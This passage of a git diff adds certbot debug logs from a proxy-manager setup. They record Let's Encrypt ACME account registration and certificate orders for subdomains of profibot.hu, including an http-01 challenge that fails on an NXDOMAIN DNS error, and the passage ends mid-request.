"dev.profibot.hu"\n }\n ]\n}' +2025-12-24 21:21:31,341:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/new-order: +{ + "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICI1OHRTM3FqRXVWbVVRRko0OGRYWktySkNjdnpBQTZfZm1fUnAxRnF0V2hJZTdibkZnUHciLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL25ldy1vcmRlciJ9", + "signature": "E3NOywYUuc0vnsf-7hmjZ_ggVC72zd29KZZDgpmugsp6UIvp4Knq8zBclwD0W2RGbYem3i63MXXWzgNbj2puJFQqPKSD079jGqR27qApJbmaKOK10yAHxgjG0-fiVHIVTLn-PEbhubX-WxH7dkGkUfo6jBhy_yFi0ZK0k3aLGrsDAvR78lDveM7CP9G3viE2fa2hI4_JEpzETINERuewCgTr58xBryAG7fHGrGCOFnZDC7KBBIkHZ8EFkJqzpyFgdLHDYJ-HtFE8M2fiOby5vdGnyWcNFXdZFvVqEt-p3cIwtvDXBwAL6hVwLrXq-B01xr84MqsfB3RE18zMYam4ig", + "payload": "ewogICJpZGVudGlmaWVycyI6IFsKICAgIHsKICAgICAgInR5cGUiOiAiZG5zIiwKICAgICAgInZhbHVlIjogImRldi5wcm9maWJvdC5odSIKICAgIH0KICBdCn0" +} +2025-12-24 21:21:31,673:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/new-order HTTP/1.1" 201 349 +2025-12-24 21:21:31,673:DEBUG:acme.client:Received response: +HTTP 201 +Server: nginx +Date: Wed, 24 Dec 2025 21:21:31 GMT +Content-Type: application/json +Content-Length: 349 +Connection: keep-alive +Boulder-Requester: 2906438176 +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index" +Location: https://acme-v02.api.letsencrypt.org/acme/order/2906438176/462324452966 +Replay-Nonce: 58tS3qjEliVwndrn6E2BxW6Lb7OyzUK_Jzl7wNIrtvpTMkPgxTo +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "status": "pending", + "expires": "2025-12-31T21:21:31Z", + "identifiers": [ + { + "type": "dns", + "value": "dev.profibot.hu" + } + ], + "authorizations": [ + "https://acme-v02.api.letsencrypt.org/acme/authz/2906438176/632517542506" + ], + "finalize": "https://acme-v02.api.letsencrypt.org/acme/finalize/2906438176/462324452966" +} +2025-12-24 21:21:31,673:DEBUG:acme.client:Storing nonce: 58tS3qjEliVwndrn6E2BxW6Lb7OyzUK_Jzl7wNIrtvpTMkPgxTo +2025-12-24 21:21:31,674:DEBUG:acme.client:JWS payload: +b'' +2025-12-24 21:21:31,677:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/2906438176/632517542506: +{ + "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICI1OHRTM3FqRWxpVnduZHJuNkUyQnhXNkxiN095elVLX0p6bDd3TklydHZwVE1rUGd4VG8iLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzI5MDY0MzgxNzYvNjMyNTE3NTQyNTA2In0", + "signature": "fzuL8PNxCmdszwkla-0uKjB5jeVNVLhedrjMKspWXjEWJU3RsH9NzN3JOgB1Qs4xD7TVbcHQxOWjb_BDGXcLcE6Uk5rPPv-D5BieTvJkIQ8y0fimxY6JJLjThJ0bN0tgas2uBhhyiU3uvBkBUkFzdAZaA4Fn5Y2qy6e9BRODKjeG0pyv3LaTrRoPn9cz4bKA77fJ5zFaHj-kzgYlw8OiaYcUjcZbr7Chn00bheuqKdaOS1Pieg_pAnoJkN2uEAty3JJl33nb2Ws0XJBJ8iVWAe4KgNQPTtF11KfNmEEj9DBCrTdsC2axyKaOnYwRA9FTmjeeRjAWyxFO5_rITT2Fkg", + "payload": "" +} +2025-12-24 21:21:31,835:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/2906438176/632517542506 HTTP/1.1" 200 823 +2025-12-24 21:21:31,836:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Wed, 24 Dec 2025 21:21:31 GMT +Content-Type: application/json +Content-Length: 823 +Connection: keep-alive +Boulder-Requester: 2906438176 +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index" +Replay-Nonce: 58tS3qjEQW_ZsNE1cRFjPmi98oNWyZJAwXLjFjwLBvUQT1hB8Hk +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "identifier": { + "type": "dns", + "value": "dev.profibot.hu" + }, + "status": "pending", + "expires": "2025-12-31T21:21:31Z", + "challenges": [ + { + "type": "http-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632517542506/daSokg", + "status": "pending", + "token": "hV2I34lK51uE2EOPh9Lrn6F1CJZWOyPiAElHBAg1pJE" + }, + { + "type": "dns-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632517542506/O7D10A", + "status": "pending", + "token": "hV2I34lK51uE2EOPh9Lrn6F1CJZWOyPiAElHBAg1pJE" + }, + { + "type": "tls-alpn-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632517542506/3brn_Q", + "status": "pending", + "token": "hV2I34lK51uE2EOPh9Lrn6F1CJZWOyPiAElHBAg1pJE" + } + ] +} +2025-12-24 21:21:31,836:DEBUG:acme.client:Storing nonce: 58tS3qjEQW_ZsNE1cRFjPmi98oNWyZJAwXLjFjwLBvUQT1hB8Hk +2025-12-24 21:21:31,837:DEBUG:acme.challenges:tls-alpn-01 was not recognized, full message: {'type': 'tls-alpn-01', 'url': 'https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632517542506/3brn_Q', 'status': 'pending', 'token': 'hV2I34lK51uE2EOPh9Lrn6F1CJZWOyPiAElHBAg1pJE'} +2025-12-24 21:21:31,838:INFO:certbot._internal.auth_handler:Performing the following challenges: +2025-12-24 21:21:31,838:INFO:certbot._internal.auth_handler:http-01 challenge for dev.profibot.hu +2025-12-24 21:21:31,839:INFO:certbot._internal.plugins.webroot:Using the webroot path /data/letsencrypt-acme-challenge for all unmatched domains. +2025-12-24 21:21:31,839:DEBUG:certbot._internal.plugins.webroot:Creating root challenges validation dir at /data/letsencrypt-acme-challenge/.well-known/acme-challenge +2025-12-24 21:21:31,848:DEBUG:certbot._internal.plugins.webroot:Attempting to save validation to /data/letsencrypt-acme-challenge/.well-known/acme-challenge/hV2I34lK51uE2EOPh9Lrn6F1CJZWOyPiAElHBAg1pJE +2025-12-24 21:21:31,849:DEBUG:acme.client:JWS payload: +b'{}' +2025-12-24 21:21:31,852:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632517542506/daSokg: +{ + "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICI1OHRTM3FqRVFXX1pzTkUxY1JGalBtaTk4b05XeVpKQXdYTGpGandMQnZVUVQxaEI4SGsiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2NoYWxsLzI5MDY0MzgxNzYvNjMyNTE3NTQyNTA2L2RhU29rZyJ9", + "signature": "jw8w89RyC3oknflMH8mH_VjSDOJtSxNAwyqTTybDq7zybeAzvr-g7-pjXeLbVi3BX3iETBh57Jnk_t6EZkcToTEDHfupHTWeUIRQmtvnypetJJa8lu2Xm-A7_DenRSRJxRU-2EhsFSKV8eoteLbJF8QG2MLAPyWnduEXER2qp6K2JH_AjJa-w3wGLVumSYh2dlfiWfqaF-JyLG8gihFWNC7FnKtJNm3LAd_g7aTjVwEwUOiDe2fDfvEdfiTG3DPqfDWp_ukw480SXBRHC1yYhOX3rkvAFYGvV30gYg3zqFnNmVdPFSGtY7TKGb4PJgl8VO3e87hOP6PWCD93XTYs1g", + "payload": "e30" +} +2025-12-24 21:21:32,011:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/chall/2906438176/632517542506/daSokg HTTP/1.1" 200 195 +2025-12-24 21:21:32,012:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Wed, 24 Dec 2025 21:21:31 GMT +Content-Type: application/json +Content-Length: 195 +Connection: keep-alive +Boulder-Requester: 2906438176 +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index", ;rel="up" +Location: https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632517542506/daSokg +Replay-Nonce: 58tS3qjESXYq-7REFTf9TBKNRi69JoFW4obdwK9tOA45ZJLHGMA +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "type": "http-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632517542506/daSokg", + "status": "pending", + "token": "hV2I34lK51uE2EOPh9Lrn6F1CJZWOyPiAElHBAg1pJE" +} +2025-12-24 21:21:32,012:DEBUG:acme.client:Storing nonce: 58tS3qjESXYq-7REFTf9TBKNRi69JoFW4obdwK9tOA45ZJLHGMA +2025-12-24 21:21:32,013:INFO:certbot._internal.auth_handler:Waiting for verification... +2025-12-24 21:21:33,014:DEBUG:acme.client:JWS payload: +b'' +2025-12-24 21:21:33,018:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/2906438176/632517542506: +{ + "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICI1OHRTM3FqRVNYWXEtN1JFRlRmOVRCS05SaTY5Sm9GVzRvYmR3Szl0T0E0NVpKTEhHTUEiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzI5MDY0MzgxNzYvNjMyNTE3NTQyNTA2In0", + "signature": "NJ15FCDtT8mqJNv2ue4xVnzUiOQUF8snHTl3UfvHE7I2FIoKc57Qy8adoqylHHgIkH_ascVg93gbyl9I43p8alqwzF6VUYFdRDY2dHrILRRUgadOk9BY_r-mUO11byhzmfyt_t2pBKd7vomBDhUJaeo9jxM_y5H43o5WvIA4fB72c7s2Fi6O6b0_4zL9VvxxqCzZaC_B4znRCaW0oIFflw9UvZLO_aDRSB4MQJr2RSxRQaZ32wUGeHVjrdHArNajrrZtPK0KJs6Cuj8IvdH8jhAAMFCEW7hT0fK2yjnNeYHWAQD6bk8xyuqSYLx1-UwU5tu3TIezDuQowZTtOw6A1Q", + "payload": "" +} +2025-12-24 21:21:33,174:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/2906438176/632517542506 HTTP/1.1" 200 752 +2025-12-24 21:21:33,175:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Wed, 24 Dec 2025 21:21:33 GMT +Content-Type: application/json +Content-Length: 752 +Connection: keep-alive +Boulder-Requester: 2906438176 +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index" +Replay-Nonce: 58tS3qjEQMMhUxPtHld6Bw9adr5ebPs-smHXj6yFzhk9ColtEvg +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "identifier": { + "type": "dns", + "value": "dev.profibot.hu" + }, + "status": "invalid", + "expires": "2025-12-31T21:21:31Z", + "challenges": [ + { + "type": "http-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632517542506/daSokg", + "status": "invalid", + "validated": "2025-12-24T21:21:31Z", + "error": { + "type": "urn:ietf:params:acme:error:dns", + "detail": "DNS problem: NXDOMAIN looking up A for dev.profibot.hu - check that a DNS record exists for this domain; DNS problem: NXDOMAIN looking up AAAA for dev.profibot.hu - check that a DNS record exists for this domain", + "status": 400 + }, + "token": "hV2I34lK51uE2EOPh9Lrn6F1CJZWOyPiAElHBAg1pJE" + } + ] +} +2025-12-24 21:21:33,175:DEBUG:acme.client:Storing nonce: 58tS3qjEQMMhUxPtHld6Bw9adr5ebPs-smHXj6yFzhk9ColtEvg +2025-12-24 21:21:33,176:INFO:certbot._internal.auth_handler:Challenge failed for domain dev.profibot.hu +2025-12-24 21:21:33,176:INFO:certbot._internal.auth_handler:http-01 challenge for dev.profibot.hu +2025-12-24 21:21:33,176:DEBUG:certbot._internal.display.obj:Notifying user: +Certbot failed to authenticate some domains (authenticator: webroot). The Certificate Authority reported these problems: + Domain: dev.profibot.hu + Type: dns + Detail: DNS problem: NXDOMAIN looking up A for dev.profibot.hu - check that a DNS record exists for this domain; DNS problem: NXDOMAIN looking up AAAA for dev.profibot.hu - check that a DNS record exists for this domain + +Hint: The Certificate Authority failed to download the temporary challenge files created by Certbot. Ensure that the listed domains serve their content from the provided --webroot-path/-w and that files created there can be downloaded from the internet. + +2025-12-24 21:21:33,185:DEBUG:certbot._internal.error_handler:Encountered exception: +Traceback (most recent call last): + File "/opt/certbot/lib/python3.11/site-packages/certbot/_internal/auth_handler.py", line 104, in handle_authorizations + self._poll_authorizations(authzrs, max_retries, max_time_mins, best_effort) + File "/opt/certbot/lib/python3.11/site-packages/certbot/_internal/auth_handler.py", line 208, in _poll_authorizations + raise errors.AuthorizationError('Some challenges have failed.') +certbot.errors.AuthorizationError: Some challenges have failed. + +2025-12-24 21:21:33,186:DEBUG:certbot._internal.error_handler:Calling registered functions +2025-12-24 21:21:33,186:INFO:certbot._internal.auth_handler:Cleaning up challenges +2025-12-24 21:21:33,186:DEBUG:certbot._internal.plugins.webroot:Removing /data/letsencrypt-acme-challenge/.well-known/acme-challenge/hV2I34lK51uE2EOPh9Lrn6F1CJZWOyPiAElHBAg1pJE +2025-12-24 21:21:33,187:DEBUG:certbot._internal.plugins.webroot:All challenges cleaned up +2025-12-24 21:21:33,188:DEBUG:certbot._internal.log:Exiting abnormally: +Traceback (most recent call last): + File "/opt/certbot/bin/certbot", line 7, in + sys.exit(main()) + ^^^^^^ + File "/opt/certbot/lib/python3.11/site-packages/certbot/main.py", line 18, in main + return internal_main.main(cli_args) + ^^^^^^^^^^^^^^^^^^^^^^^^^^^^ + File "/opt/certbot/lib/python3.11/site-packages/certbot/_internal/main.py", line 1850, in main + return config.func(config, plugins) + ^^^^^^^^^^^^^^^^^^^^^^^^^^^^ + File "/opt/certbot/lib/python3.11/site-packages/certbot/_internal/main.py", line 1562, in certonly + lineage = _get_and_save_cert(le_client, config, domains, certname, lineage) + ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ + File "/opt/certbot/lib/python3.11/site-packages/certbot/_internal/main.py", line 141, in _get_and_save_cert + lineage = le_client.obtain_and_enroll_certificate(domains, certname) + ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ + File "/opt/certbot/lib/python3.11/site-packages/certbot/_internal/client.py", line 526, in obtain_and_enroll_certificate + cert, chain, key, _ = self.obtain_certificate(domains) + ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ + File "/opt/certbot/lib/python3.11/site-packages/certbot/_internal/client.py", line 427, in obtain_certificate + orderr = self._get_order_and_authorizations(csr.data, self.config.allow_subset_of_names) + ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ + File "/opt/certbot/lib/python3.11/site-packages/certbot/_internal/client.py", line 505, in _get_order_and_authorizations + authzr = self.auth_handler.handle_authorizations(orderr, self.config, best_effort) + ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ + File "/opt/certbot/lib/python3.11/site-packages/certbot/_internal/auth_handler.py", line 104, in handle_authorizations + self._poll_authorizations(authzrs, max_retries, max_time_mins, best_effort) + File "/opt/certbot/lib/python3.11/site-packages/certbot/_internal/auth_handler.py", line 208, in _poll_authorizations + raise errors.AuthorizationError('Some challenges have failed.') +certbot.errors.AuthorizationError: Some challenges have failed. +2025-12-24 21:21:33,196:ERROR:certbot._internal.log:Some challenges have failed. diff --git a/proxy-manager/data/logs/letsencrypt.log.18 b/proxy-manager/data/logs/letsencrypt.log.18 new file mode 100755 index 0000000..365f85d --- /dev/null +++ b/proxy-manager/data/logs/letsencrypt.log.18 @@ -0,0 +1,332 @@ +2025-12-24 20:49:54,457:DEBUG:certbot._internal.main:certbot version: 5.1.0 +2025-12-24 20:49:54,457:DEBUG:certbot._internal.main:Location of certbot entry point: /opt/certbot/bin/certbot +2025-12-24 20:49:54,457:DEBUG:certbot._internal.main:Arguments: ['--config', '/etc/letsencrypt.ini', '--work-dir', '/tmp/letsencrypt-lib', '--logs-dir', '/data/logs', '--cert-name', 'npm-1', '--agree-tos', '--authenticator', 'webroot', '-m', 'kincses@gmail.com', '--preferred-challenges', 'http', '--domains', 'db.profibot.hu'] +2025-12-24 20:49:54,457:DEBUG:certbot._internal.main:Discovered plugins: PluginsRegistry(PluginEntryPoint#manual,PluginEntryPoint#null,PluginEntryPoint#standalone,PluginEntryPoint#webroot) +2025-12-24 20:49:54,468:DEBUG:certbot._internal.log:Root logging level set at 30 +2025-12-24 20:49:54,469:DEBUG:certbot._internal.plugins.selection:Requested authenticator webroot and installer None +2025-12-24 20:49:54,469:DEBUG:certbot._internal.plugins.selection:Single candidate plugin: * webroot +Description: Saves the necessary validation files to a .well-known/acme-challenge/ directory within the nominated webroot path. A separate HTTP server must be running and serving files from the webroot path. HTTP challenge only (wildcards not supported). +Interfaces: Authenticator, Plugin +Entry point: EntryPoint(name='webroot', value='certbot._internal.plugins.webroot:Authenticator', group='certbot.plugins') +Initialized: +Prep: True +2025-12-24 20:49:54,469:DEBUG:certbot._internal.plugins.selection:Selected authenticator and installer None +2025-12-24 20:49:54,469:INFO:certbot._internal.plugins.selection:Plugins selected: Authenticator webroot, Installer None +2025-12-24 20:49:54,515:DEBUG:acme.client:Sending GET request to https://acme-v02.api.letsencrypt.org/directory. +2025-12-24 20:49:54,516:DEBUG:urllib3.connectionpool:Starting new HTTPS connection (1): acme-v02.api.letsencrypt.org:443 +2025-12-24 20:49:54,990:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "GET /directory HTTP/1.1" 200 1033 +2025-12-24 20:49:54,991:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Wed, 24 Dec 2025 20:49:54 GMT +Content-Type: application/json +Content-Length: 1033 +Connection: keep-alive +Cache-Control: public, max-age=0, no-cache +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "keyChange": "https://acme-v02.api.letsencrypt.org/acme/key-change", + "meta": { + "caaIdentities": [ + "letsencrypt.org" + ], + "profiles": { + "classic": "https://letsencrypt.org/docs/profiles#classic", + "shortlived": "https://letsencrypt.org/docs/profiles#shortlived", + "tlsclient": "https://letsencrypt.org/docs/profiles#tlsclient", + "tlsserver": "https://letsencrypt.org/docs/profiles#tlsserver" + }, + "termsOfService": "https://letsencrypt.org/documents/LE-SA-v1.6-August-18-2025.pdf", + "website": "https://letsencrypt.org" + }, + "newAccount": "https://acme-v02.api.letsencrypt.org/acme/new-acct", + "newNonce": "https://acme-v02.api.letsencrypt.org/acme/new-nonce", + "newOrder": "https://acme-v02.api.letsencrypt.org/acme/new-order", + "renewalInfo": "https://acme-v02.api.letsencrypt.org/acme/renewal-info", + "revokeCert": "https://acme-v02.api.letsencrypt.org/acme/revoke-cert", + "vH-fIBjUpTE": "https://community.letsencrypt.org/t/adding-random-entries-to-the-directory/33417" +} +2025-12-24 20:49:54,992:DEBUG:acme.client:Requesting fresh nonce +2025-12-24 20:49:54,992:DEBUG:acme.client:Sending HEAD request to https://acme-v02.api.letsencrypt.org/acme/new-nonce. +2025-12-24 20:49:55,147:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "HEAD /acme/new-nonce HTTP/1.1" 200 0 +2025-12-24 20:49:55,148:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Wed, 24 Dec 2025 20:49:55 GMT +Connection: keep-alive +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index" +Replay-Nonce: 58tS3qjEHoicSN-U4SRTgAqBcNToOn4CNTVtDuT9tuYJEYy3Tsk +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + + +2025-12-24 20:49:55,148:DEBUG:acme.client:Storing nonce: 58tS3qjEHoicSN-U4SRTgAqBcNToOn4CNTVtDuT9tuYJEYy3Tsk +2025-12-24 20:49:55,149:DEBUG:acme.client:JWS payload: +b'{\n "contact": [\n "mailto:kincses@gmail.com"\n ],\n "termsOfServiceAgreed": true\n}' +2025-12-24 20:49:55,153:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/new-acct: +{ + "protected": "eyJhbGciOiAiUlMyNTYiLCAiandrIjogeyJuIjogIm1GRnRreEIxa3JjaV9VS2dEbzBMbnNpWHF1UUxhNmZBVHhiZGdBVjFiOVpfM3N2WjU2N21VdFhGS3Z5WDNMdVRyclZWLTlnby03NnJYUGFOZmRZalRHcEprUEozMGZka1ZoYkk0R1Y1SWFINXVvb2FRYTJuMFdSazJJLTlCczlGaS02VXZBQzlwR055TkpxUWQzRTRRd1FacFFvbWFsOWhXeDVhQ0pwNml2VDREMVZvbXFZVHJtZ3N6RFJNbDRtT2xmT2pTMVJJUWljSVFNS0F2Y3BsZC0yc2w5Wlh1akFOaWVaaVVfTG4xTHZnNFc0TTdfZ0dMN3BYVFM2N1dPaEUwNWVMRW8wVExUSGVMcERfaVNMMzhKS1g4eWwyWmtLOElkVnJ0WjVHdlRuMmhrcjEzeUNlZUNLY25vdDNIYkgycWhrV1BkS0o1TGZHS2h0YUdYT2RzdyIsICJlIjogIkFRQUIiLCAia3R5IjogIlJTQSJ9LCAibm9uY2UiOiAiNTh0UzNxakVIb2ljU04tVTRTUlRnQXFCY05Ub09uNENOVFZ0RHVUOXR1WUpFWXkzVHNrIiwgInVybCI6ICJodHRwczovL2FjbWUtdjAyLmFwaS5sZXRzZW5jcnlwdC5vcmcvYWNtZS9uZXctYWNjdCJ9", + "signature": "RpyN-mLy2_OgHxW0LMA24cXhVGGXG227CmCKMQ0zdYCTzeOH719f3sZstAfJV7LaI5vPH6SrewsMHQELQB3ZBe_eisB8oVj0reEj47w6vEie5Z0YrXp2H4vc71NQ7SrhRukLf-Kd_UCDKRSU3Wes32mGez4ObkV7MpNRI0yx9cIigtNuKu3cuvIoWi7ue312HSYaKzbi78UZMN3o_ns2lIcPPWCFqiZg0ZQ7o7OOYPFyv1I-aKncRxbot8vTEcW0JllgacnX0oQfrCbA5V8Ke2fgyW2bbOSGYqNVDolk0O2bnX9xo0SVsddxgwB04bofYm4PonM7oh1o39f6sgrSFQ", + "payload": "ewogICJjb250YWN0IjogWwogICAgIm1haWx0bzpraW5jc2VzQGdtYWlsLmNvbSIKICBdLAogICJ0ZXJtc09mU2VydmljZUFncmVlZCI6IHRydWUKfQ" +} +2025-12-24 20:49:55,339:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/new-acct HTTP/1.1" 201 477 +2025-12-24 20:49:55,340:DEBUG:acme.client:Received response: +HTTP 201 +Server: nginx +Date: Wed, 24 Dec 2025 20:49:55 GMT +Content-Type: application/json +Content-Length: 477 +Connection: keep-alive +Boulder-Requester: 2906438176 +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index", ;rel="terms-of-service" +Location: https://acme-v02.api.letsencrypt.org/acme/acct/2906438176 +Replay-Nonce: fULB7aUJ6TrSH2rJJ-9k7oM_ORwuFR9fdwfVB2ILakyp4gbrlq0 +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "key": { + "kty": "RSA", + "n": "mFFtkxB1krci_UKgDo0LnsiXquQLa6fATxbdgAV1b9Z_3svZ567mUtXFKvyX3LuTrrVV-9go-76rXPaNfdYjTGpJkPJ30fdkVhbI4GV5IaH5uooaQa2n0WRk2I-9Bs9Fi-6UvAC9pGNyNJqQd3E4QwQZpQomal9hWx5aCJp6ivT4D1VomqYTrmgszDRMl4mOlfOjS1RIQicIQMKAvcpld-2sl9ZXujANieZiU_Ln1Lvg4W4M7_gGL7pXTS67WOhE05eLEo0TLTHeLpD_iSL38JKX8yl2ZkK8IdVrtZ5GvTn2hkr13yCeeCKcnot3HbH2qhkWPdKJ5LfGKhtaGXOdsw", + "e": "AQAB" + }, + "createdAt": "2025-12-24T20:49:55.263765908Z", + "status": "valid" +} +2025-12-24 20:49:55,340:DEBUG:acme.client:Storing nonce: fULB7aUJ6TrSH2rJJ-9k7oM_ORwuFR9fdwfVB2ILakyp4gbrlq0 +2025-12-24 20:49:55,344:DEBUG:certbot._internal.display.obj:Notifying user: Account registered. +2025-12-24 20:49:55,344:DEBUG:certbot._internal.main:Picked account: )>), contact=(), agreement=None, status='valid', terms_of_service_agreed=None, only_return_existing=None, external_account_binding=None), uri='https://acme-v02.api.letsencrypt.org/acme/acct/2906438176', new_authzr_uri=None, terms_of_service='https://letsencrypt.org/documents/LE-SA-v1.6-August-18-2025.pdf'), e417a583de478a0cfdeed332c1113068, Meta(creation_dt=datetime.datetime(2025, 12, 24, 20, 49, 55, tzinfo=datetime.timezone.utc), creation_host='c6fe500e2aae', register_to_eff=None))> +2025-12-24 20:49:55,346:DEBUG:certbot._internal.display.obj:Notifying user: Requesting a certificate for db.profibot.hu +2025-12-24 20:49:55,351:DEBUG:acme.client:JWS payload: +b'{\n "identifiers": [\n {\n "type": "dns",\n "value": "db.profibot.hu"\n }\n ]\n}' +2025-12-24 20:49:55,355:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/new-order: +{ + "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICJmVUxCN2FVSjZUclNIMnJKSi05azdvTV9PUnd1RlI5ZmR3ZlZCMklMYWt5cDRnYnJscTAiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL25ldy1vcmRlciJ9", + "signature": "JltXpxEfUopaWTgCVGebHue0sM0lht52j2ooAv0nj8vAjU7nWKwwVNgKzrzq5AgW5s635bpNhzUaGmRveejMfM4sghabPFwLYItpYB55pF9u3NDH8JlDzfxJGwKrHUvn3_4Mjab4kpdPocDC7SHKqdMaHUnQtnx-FQGARD1U8YNwJEzksxQ1QGEhf5Y0ZwtEsSTSNLZDRysL8d1sDRYfRL3JBEqHMhH3IidRlka6P0G82zJ4s-1YtwLuF9lzvSGL-I3Zg446dvvI_1EWWm7te0jh5cuPJQswW-F9VB7cRAyJvZm9eR-hP3CYB_TaydfweHAw0hNVbpdojGaGpUVcnw", + "payload": "ewogICJpZGVudGlmaWVycyI6IFsKICAgIHsKICAgICAgInR5cGUiOiAiZG5zIiwKICAgICAgInZhbHVlIjogImRiLnByb2ZpYm90Lmh1IgogICAgfQogIF0KfQ" +} +2025-12-24 20:49:55,536:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/new-order HTTP/1.1" 201 348 +2025-12-24 20:49:55,537:DEBUG:acme.client:Received response: +HTTP 201 +Server: nginx +Date: Wed, 24 Dec 2025 20:49:55 GMT +Content-Type: application/json +Content-Length: 348 +Connection: keep-alive +Boulder-Requester: 2906438176 +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index" +Location: https://acme-v02.api.letsencrypt.org/acme/order/2906438176/462316842596 +Replay-Nonce: fULB7aUJhPtSP1F2SgroOzH85YgOOLN5Tj3B3vhrz35mtakzsLw +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "status": "pending", + "expires": "2025-12-31T20:49:55Z", + "identifiers": [ + { + "type": "dns", + "value": "db.profibot.hu" + } + ], + "authorizations": [ + "https://acme-v02.api.letsencrypt.org/acme/authz/2906438176/632506783986" + ], + "finalize": "https://acme-v02.api.letsencrypt.org/acme/finalize/2906438176/462316842596" +} +2025-12-24 20:49:55,537:DEBUG:acme.client:Storing nonce: fULB7aUJhPtSP1F2SgroOzH85YgOOLN5Tj3B3vhrz35mtakzsLw +2025-12-24 20:49:55,538:DEBUG:acme.client:JWS payload: +b'' +2025-12-24 20:49:55,542:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/2906438176/632506783986: +{ + "protected": 